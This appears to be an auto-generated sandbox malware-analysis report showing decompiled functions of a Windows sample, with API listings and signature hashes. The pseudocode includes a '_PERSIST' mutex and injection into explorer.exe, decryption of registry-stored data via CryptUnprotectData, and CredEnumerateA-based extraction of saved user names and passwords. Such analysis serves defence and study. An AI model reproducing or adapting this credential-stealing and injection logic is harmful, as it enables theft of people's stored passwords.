                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction ID: 72f15282d468185fbe7a0b5f937441395a77a4796b686d6b9836a445fb31a29c
                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction Fuzzy Hash: 6ED0127325024CBFC700EEBDCC05DAB33DC9718609B008425B918C7100D139EA508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403568, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00403568(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x0040356b
                                    0x00403573
                                    0x0040357e
                                    0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: b1e9c139d53b74868f197cdea1108a814add3867d20bcc7908f8201953e61f5a
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: 0FC0127315024CABC700EEBDCC05D9B33DC5718609B008425B518C7100D139E6508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040115D, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlReAllocateHeap.NTDLL(007A0000,00000000), ref: 0040116D
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction ID: de04998b76c7b9bc537c8d7dd9716f6d6fbeb3d3f43a7f0598963b3529812e59
                                    • Opcode Fuzzy Hash: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction Fuzzy Hash: 08B092B2500100AAD740D799DD42F4222ACA30C348F840C647248F31A1D13CA420472C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401122, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00401122(long __eax) {
				long _t2;
				void* _t3;
				void* _t4;

				_t2 =  *0x40d03c; // 0x0
				_t3 =  *0x40e590; // 0x7a0000
				_t4 = RtlAllocateHeap(_t3, _t2, __eax); // executed
				return _t4;
			}






                                    0x00401125
                                    0x0040112b
                                    0x00401131
                                    0x00401136

                                    APIs
                                    • RtlAllocateHeap.NTDLL(007A0000,00000000), ref: 00401131
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction ID: c8d19fe016ae2e0651702f7a29d851e7a2fc058706c9609f530dee1e772ded5c
                                    • Opcode Fuzzy Hash: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction Fuzzy Hash: 65B092A5A00000AFE640E7ED9E40E2223ECA70C2083800C247208E3162E13898104728
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401139, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 33%
                                    			E00401139(void* __eax) {
				signed int _t2;
				void* _t4;
				signed int _t5;

				_t2 =  *0x40d03c; // 0x0
				_t4 =  *0x40e590; // 0x7a0000
				_t5 = HeapFree(_t4, _t2 & 0x00000001, ??); // executed
				asm("sbb eax, eax");
				return  ~_t5 & 0x0000007f;
			}






                                    0x0040113c
                                    0x00401145
                                    0x0040114b
                                    0x00401153
                                    0x0040115b

                                    APIs
                                    • HeapFree.KERNEL32(007A0000,00000000), ref: 0040114B
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction ID: 0196c5bfe9261146ad4c3cc9aab034bd4c3b0778a6c2e215fe72248fa00cbfe1
                                    • Opcode Fuzzy Hash: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction Fuzzy Hash: 47C08CB3220101ABDB0087E9DDC2D6622ECB208208B140C21F908EB061E13EC8A40228
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 0040B7FC, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 85processthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E0040B7FC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v96;
				intOrPtr _t21;
				void* _t44;
				intOrPtr* _t50;
				intOrPtr _t53;
				void* _t62;

				_push(__ebx);
				_push(__esi);
				_v96 = 0;
				_push(_t62);
				_push(0x40b8fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62 + 0xffffffa4;
				_t50 =  *0x40d204; // 0x40e8f8
				E00401D9C( &_v96, "_PERSIST",  *_t50);
				_t44 = E00403568(0, 0, E00401F48(_v96));
				if(GetLastError() != 0xb7) {
					CloseHandle(_t44);
					_t21 =  *0x40d1cc; // 0x40e924
					_t59 = E00401F9C(_t21);
					GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
					if(E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t27, "_PERSIST", _t22, __edi, _t22) == 0) {
						E00403738();
						E00403738();
						CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v92,  &_v24);
						E004040F4(_v24.hProcess, _v24.hProcess, "_PERSIST", _t59, __edi, _t59);
					}
				} else {
					CloseHandle(_t44);
				}
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E0040B901);
				return E00401AC0( &_v96);
			}












                                    0x0040b802
                                    0x0040b803
                                    0x0040b806
                                    0x0040b80b
                                    0x0040b80c
                                    0x0040b811
                                    0x0040b814
                                    0x0040b817
                                    0x0040b827
                                    0x0040b83e
                                    0x0040b84a
                                    0x0040b858
                                    0x0040b85d
                                    0x0040b867
                                    0x0040b87a
                                    0x0040b89c
                                    0x0040b8a6
                                    0x0040b8b3
                                    0x0040b8d3
                                    0x0040b8df
                                    0x0040b8df
                                    0x0040b84c
                                    0x0040b84d
                                    0x0040b84d
                                    0x0040b8e6
                                    0x0040b8e9
                                    0x0040b8ec
                                    0x0040b8f9

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040B8FA), ref: 0040B840
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B84D
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B858
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040B874
                                    • GetWindowThreadProcessId.USER32(00000000,Shell_TrayWnd), ref: 0040B87A
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000,?,00000000,00000000,0040B8FA), ref: 0040B88A
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000), ref: 0040B8D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCreateHandleWindow$ErrorFindLastMutexOpenThread
                                    • String ID: $@$Shell_TrayWnd$_PERSIST$explorer.exe
                                    • API String ID: 3936873891-3256395681
                                    • Opcode ID: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction ID: a98b29369305a718b3746a0c20b80fe6e43b54703aa679a88659f244b6e949d5
                                    • Opcode Fuzzy Hash: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction Fuzzy Hash: 862131B5B402097BE710FBA5CC42F9E77ACDB44705F60843BB600BB2D2DA78AE05566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408E58, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 328registryencryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00408E58(char __eax, void* __ebx, void* __ecx, char* __edx, void* __edi, char* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				int _v16;
				char _v20;
				void* _v24;
				int _v28;
				int _v32;
				int _v36;
				char* _v40;
				char* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				long _t168;
				long _t238;
				long _t251;
				char* _t259;
				signed int _t260;
				intOrPtr _t262;
				intOrPtr _t323;
				intOrPtr _t326;
				intOrPtr _t327;
				long _t339;
				long _t340;
				intOrPtr _t343;
				intOrPtr _t344;
				void* _t350;

				_t350 = __fp0;
				_t341 = __esi;
				_t343 = _t344;
				_t262 = 0xd;
				do {
					_push(0);
					_push(0);
					_t262 = _t262 - 1;
				} while (_t262 != 0);
				_t1 =  &_v8;
				 *_t1 = _t262;
				_push(__esi);
				_v12 =  *_t1;
				_t259 = __edx;
				_v8 = __eax;
				E0040302C(_v8);
				_push(_t343);
				_push(0x4092a7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t344;
				E00401AC0( &_v80);
				_v16 = 0;
				if(RegOpenKeyExA(0x80000001, _t259, 0, 1,  &_v24) == 0) {
					_v28 = 0x400;
					_t341 = E00401174(_v28);
					while(RegEnumValueA(_v24, _v16, _t341,  &_v28, 0, 0, 0, 0) != 0x103) {
						_v28 = 0x400;
						_t339 = E00402E08();
						__eflags = _t339;
						if(_t339 >= 0) {
							_t340 = _t339 + 1;
							_t260 = 0;
							__eflags = 0;
							do {
								E00408AF8( *((intOrPtr*)(_v8 + _t260 * 4)), _t260,  &_v20, _t340, _t341);
								RegQueryValueExA(_v24, _t341, 0,  &_v32, 0,  &_v36);
								_push(_v36);
								E00402FBC();
								_t344 = _t344 + 4;
								_t238 = RegQueryValueExA(_v24, _t341, 0,  &_v32, _v40,  &_v36);
								__eflags = _t238;
								if(_t238 == 0) {
									_v44 = _v40;
									_v48 = _v36;
									_v60 =  *((intOrPtr*)(_v8 + _t260 * 4));
									E00402218( &_v84,  *((intOrPtr*)(_v8 + _t260 * 4)));
									_v64 = E00402274(_v84) + 1 + E00402274(_v84) + 1;
									_push( &_v56);
									_push(1);
									_push(0);
									_push(0);
									_push( &_v64);
									_push(0);
									_t251 =  &_v48;
									_push(_t251);
									L004086F0();
									__eflags = _t251;
									if(_t251 != 0) {
										_push(_v80);
										_push("Address: ");
										E00401CDC( &_v88,  *((intOrPtr*)(_v8 + _t260 * 4)));
										_push(_v88);
										_push(0x4092d4);
										E00401E10();
										_push(_v80);
										E00408CCC(_v52, _t260,  &_v92, _t340, _t341, _t350);
										_push(_v92);
										_push(0x4092e0);
										E00401E10();
									}
								}
								_t260 = _t260 + 1;
								_t340 = _t340 - 1;
								__eflags = _t340;
							} while (_t340 != 0);
						}
						E00403738();
						_t57 =  &_v16;
						 *_t57 = _v16 + 1;
						__eflags =  *_t57;
					}
				}
				RegCloseKey(_v24);
				L17:
				while(E0040202C(0x4092e0, _v80) > 0) {
					E00401FA4(_v80, E0040202C(0x4092e0, _v80) - 1, 1,  &_v72);
					E00401FE4( &_v80, E0040202C(0x4092e0, _v80) + 1, 1);
					E00401D9C( &_v100, 0x4092e0, _v72);
					E0040592C(_v100, _t259, _v80, 0, _t341, __eflags,  &_v96);
					E00401B58( &_v80, _v96);
					__eflags = E0040202C(0x4092ec, _v72) - 1;
					E00401FA4(_v72, E0040202C(0x4092ec, _v72) - 1, 1,  &_v104);
					E00401E94(_v104, "Address");
					if(__eflags == 0) {
						E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
						E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v68);
						E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
						while(1) {
							_t168 = E0040202C(0x4092d4, _v72);
							__eflags = _t168;
							if(_t168 <= 0) {
								goto L17;
							}
							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
							_push(_v76);
							_push(_v68);
							_push(0x4092d4);
							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v108);
							_push(_v108);
							_push(0x4092d4);
							E00401E10();
							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
							_push(_v76);
							__eflags = E0040202C(0x4092d4, _v72) - 1;
							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v112);
							_push(_v112);
							_push(0x4092d4);
							E00401E10();
							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
							E00401D58( &_v76, 0x4092e0);
						}
					}
				}
				E00401B14(_v12, _v76);
				_pop(_t323);
				 *[fs:eax] = _t323;
				_push(E004092AE);
				E00401AE4( &_v112, 7);
				E00402108( &_v84);
				E00401AE4( &_v80, 4);
				_t326 =  *0x408e34; // 0x408e38
				E00402FC8( &_v40, _t326);
				E00401AC0( &_v20);
				_t327 =  *0x408730; // 0x408734
				return E00402FC8( &_v8, _t327);
			}












































                                    0x00408e58
                                    0x00408e58
                                    0x00408e59
                                    0x00408e5c
                                    0x00408e61
                                    0x00408e61
                                    0x00408e63
                                    0x00408e65
                                    0x00408e65
                                    0x00408e68
                                    0x00408e68
                                    0x00408e6c
                                    0x00408e6e
                                    0x00408e71
                                    0x00408e73
                                    0x00408e79
                                    0x00408e80
                                    0x00408e81
                                    0x00408e86
                                    0x00408e89
                                    0x00408e8f
                                    0x00408e96
                                    0x00408eae
                                    0x00408eb4
                                    0x00408ec3
                                    0x00408ff8
                                    0x00408eca
                                    0x00408ed9
                                    0x00408edb
                                    0x00408edd
                                    0x00408ee3
                                    0x00408ee4
                                    0x00408ee4
                                    0x00408ee6
                                    0x00408eef
                                    0x00408f05
                                    0x00408f0d
                                    0x00408f1c
                                    0x00408f21
                                    0x00408f37
                                    0x00408f3c
                                    0x00408f3e
                                    0x00408f47
                                    0x00408f4d
                                    0x00408f56
                                    0x00408f62
                                    0x00408f72
                                    0x00408f78
                                    0x00408f79
                                    0x00408f7b
                                    0x00408f7d
                                    0x00408f82
                                    0x00408f83
                                    0x00408f85
                                    0x00408f88
                                    0x00408f89
                                    0x00408f8e
                                    0x00408f90
                                    0x00408f92
                                    0x00408f95
                                    0x00408fa3
                                    0x00408fa8
                                    0x00408fab
                                    0x00408fb8
                                    0x00408fbd
                                    0x00408fc9
                                    0x00408fce
                                    0x00408fd1
                                    0x00408fde
                                    0x00408fde
                                    0x00408f90
                                    0x00408fe3
                                    0x00408fe4
                                    0x00408fe4
                                    0x00408fe4
                                    0x00408ee6
                                    0x00408ff0
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff8
                                    0x00409021
                                    0x00000000
                                    0x00409233
                                    0x00409047
                                    0x00409064
                                    0x00409078
                                    0x00409085
                                    0x00409090
                                    0x004090a8
                                    0x004090b1
                                    0x004090be
                                    0x004090c3
                                    0x004090e0
                                    0x00409101
                                    0x0040911d
                                    0x0040921e
                                    0x00409226
                                    0x0040922b
                                    0x0040922d
                                    0x00000000
                                    0x00000000
                                    0x0040913e
                                    0x00409143
                                    0x00409146
                                    0x00409149
                                    0x0040916a
                                    0x0040916f
                                    0x00409172
                                    0x0040917f
                                    0x0040919b
                                    0x004091b7
                                    0x004091bc
                                    0x004091d2
                                    0x004091db
                                    0x004091e0
                                    0x004091e3
                                    0x004091f0
                                    0x0040920c
                                    0x00409219
                                    0x00409219
                                    0x0040921e
                                    0x004090c3
                                    0x0040924e
                                    0x00409255
                                    0x00409258
                                    0x0040925b
                                    0x00409268
                                    0x00409270
                                    0x0040927d
                                    0x00409285
                                    0x0040928b
                                    0x00409293
                                    0x0040929b
                                    0x004092a6

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00408EA7
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001), ref: 00408F05
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 00408F37
                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 00408F89
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001,?,00000000,00000001,?,00000000,004092A7), ref: 0040900D
                                    • RegCloseKey.ADVAPI32(?,80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00409021
                                      • Part of subcall function 00408AF8: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                      • Part of subcall function 00408AF8: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                      • Part of subcall function 00408AF8: CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                      • Part of subcall function 00408AF8: CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                      • Part of subcall function 00408AF8: CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                      • Part of subcall function 00408AF8: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Value$ContextDataQuery$AcquireCloseCreateDestroyEnumOpenParamReleaseUnprotect
                                    • String ID: Address$Address: $J
                                    • API String ID: 1010751750-89420950
                                    • Opcode ID: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction ID: a1307f370dcfab90242bbc2907a83997e987d907be1ae94acc32d6e323161374
                                    • Opcode Fuzzy Hash: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction Fuzzy Hash: CBC1D135A00109ABDB01EBD5C981ADEB7B9EF48304F20447BF500F73D6DA79AE468B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040930B, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 226encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0040930B(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v114;
				intOrPtr _v117;
				void _v151;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				void* _t81;
				void* _t86;
				intOrPtr _t121;
				void* _t160;
				void* _t175;
				void* _t187;
				void* _t189;
				short* _t191;
				intOrPtr _t198;
				intOrPtr _t203;
				void* _t226;
				void* _t233;
				signed int _t234;
				void* _t236;
				intOrPtr* _t238;
				intOrPtr _t240;
				intOrPtr _t241;

				_t174 = __ebx;
				_v117 = _v117 + __edx;
				_t240 = _t241;
				_t175 = 0x1b;
				do {
					_push(0);
					_push(0);
					_t175 = _t175 - 1;
				} while (_t175 != 0);
				_push(_t175);
				_push(__ebx);
				_t236 = __eax;
				_push(_t240);
				_push(0x409651);
				_push( *[fs:eax]);
				 *[fs:eax] = _t241;
				E00401AC0(__eax);
				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
				asm("movsb");
				_t238 = _t236;
				_t233 = 0x25;
				_t81 =  &_v151;
				_t191 =  &_v114;
				do {
					 *_t191 = 0 << 2;
					_t191 = _t191 + 2;
					_t81 = _t81 + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				_v32 =  &_v114;
				_v36 = 0x4a;
				_push( &_v8);
				_push( &_v12);
				_push(0);
				_push(0);
				L004086E8();
				_t86 = _v12 - 1;
				if(_t86 >= 0) {
					_v40 = _t86 + 1;
					_t234 = 0;
					do {
						_t121 =  *((intOrPtr*)(_v8 + _t234 * 4));
						_v16 =  *((intOrPtr*)(_t121 + 0x1c));
						_v20 =  *((intOrPtr*)(_t121 + 0x18));
						_push( &_v28);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v36);
						_push(0);
						_push( &_v20);
						L004086F0();
						_push( *_t238);
						_push("Address: ");
						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t234 * 4)) + 8)));
						_push(_v156);
						_push(0x4096a4);
						E00401E10();
						E00401174(_v28);
						_t174 = _v24;
						E00401D9C( &_v168, "User: ",  *_t238);
						E00402254( &_v164, _v168);
						_push(_v164);
						_push( &_v172);
						E00402218( &_v176, _v24);
						_push(E00402398(0x4096bc, _v176) - 1);
						E00402218( &_v180, _v24);
						_pop(_t187);
						E0040234C(_v180, _t187, 0, 0);
						_push(_v172);
						_push(0x4096c4);
						E00402280();
						E00401D3C(_t238, _v160);
						E00401D9C( &_v192, "Password: ",  *_t238);
						E00402254( &_v188, _v192);
						_push(_v188);
						_push( &_v196);
						E00402218( &_v200, _v24);
						_push(E00402398(0x4096bc, _v200));
						E00402218( &_v204, _v24);
						_t160 = E00402274(_v204);
						_push(_t160 - _t222);
						E00402218( &_v208, _t174);
						_push(E00402398(0x4096bc, _v208) + 1);
						E00402218( &_v212, _t174);
						_pop(_t226);
						_pop(_t189);
						E0040234C(_v212, _t189, _t226, 0);
						_push(_v196);
						_push(0x4096c4);
						_push(0x4096e4);
						E00402280();
						E00401D3C(_t238, _v184);
						_t234 = _t234 + 1;
						_t60 =  &_v40;
						 *_t60 = _v40 - 1;
						_t249 =  *_t60;
					} while ( *_t60 != 0);
				}
				E0040592C("Address: ", _t174,  *_t238, 0, _t238, _t249,  &_v216);
				E00401B14(_t238, _v216);
				E0040592C("User: ", _t174,  *_t238, 0, _t238, _t249,  &_v220);
				E00401B14(_t238, _v220);
				E0040592C("Password: ", _t174,  *_t238, 0, _t238, _t249,  &_v224);
				E00401B14(_t238, _v224);
				_pop(_t198);
				 *[fs:eax] = _t198;
				_push(E00409658);
				E00401AE4( &_v224, 3);
				E00402120( &_v212, 5);
				E00401AC0( &_v192);
				E00402120( &_v188, 5);
				E00401AC0( &_v168);
				E00402120( &_v164, 2);
				E00401AC0( &_v156);
				_t203 =  *0x4086bc; // 0x4086c0
				return E00402FC8( &_v8, _t203);
			}


















































                                    0x0040930b
                                    0x0040930b
                                    0x0040930d
                                    0x0040930f
                                    0x00409314
                                    0x00409314
                                    0x00409316
                                    0x00409318
                                    0x00409318
                                    0x0040931b
                                    0x0040931c
                                    0x0040931f
                                    0x00409323
                                    0x00409324
                                    0x00409329
                                    0x0040932c
                                    0x00409331
                                    0x00409347
                                    0x00409349
                                    0x0040934a
                                    0x0040934b
                                    0x00409350
                                    0x00409356
                                    0x00409359
                                    0x00409360
                                    0x00409363
                                    0x00409366
                                    0x00409367
                                    0x00409367
                                    0x0040936d
                                    0x00409370
                                    0x0040937a
                                    0x0040937e
                                    0x0040937f
                                    0x00409381
                                    0x00409383
                                    0x0040938b
                                    0x0040938e
                                    0x00409395
                                    0x00409398
                                    0x0040939a
                                    0x0040939d
                                    0x004093a3
                                    0x004093a9
                                    0x004093af
                                    0x004093b0
                                    0x004093b2
                                    0x004093b4
                                    0x004093b9
                                    0x004093ba
                                    0x004093bf
                                    0x004093c0
                                    0x004093c5
                                    0x004093c7
                                    0x004093db
                                    0x004093e0
                                    0x004093e6
                                    0x004093f2
                                    0x004093fa
                                    0x004093ff
                                    0x0040940f
                                    0x00409420
                                    0x00409425
                                    0x00409431
                                    0x0040943a
                                    0x00409450
                                    0x00409459
                                    0x00409466
                                    0x00409467
                                    0x0040946c
                                    0x00409472
                                    0x00409482
                                    0x0040948f
                                    0x004094a1
                                    0x004094b2
                                    0x004094b7
                                    0x004094c3
                                    0x004094cc
                                    0x004094e1
                                    0x004094ea
                                    0x004094f5
                                    0x004094fd
                                    0x00409506
                                    0x0040951c
                                    0x00409525
                                    0x00409530
                                    0x00409531
                                    0x00409532
                                    0x00409537
                                    0x0040953d
                                    0x00409542
                                    0x00409552
                                    0x0040955f
                                    0x00409564
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x0040939a
                                    0x0040957e
                                    0x0040958b
                                    0x004095a0
                                    0x004095ad
                                    0x004095c2
                                    0x004095cf
                                    0x004095d6
                                    0x004095d9
                                    0x004095dc
                                    0x004095ec
                                    0x004095fc
                                    0x00409607
                                    0x00409617
                                    0x00409622
                                    0x00409632
                                    0x0040963d
                                    0x00409645
                                    0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
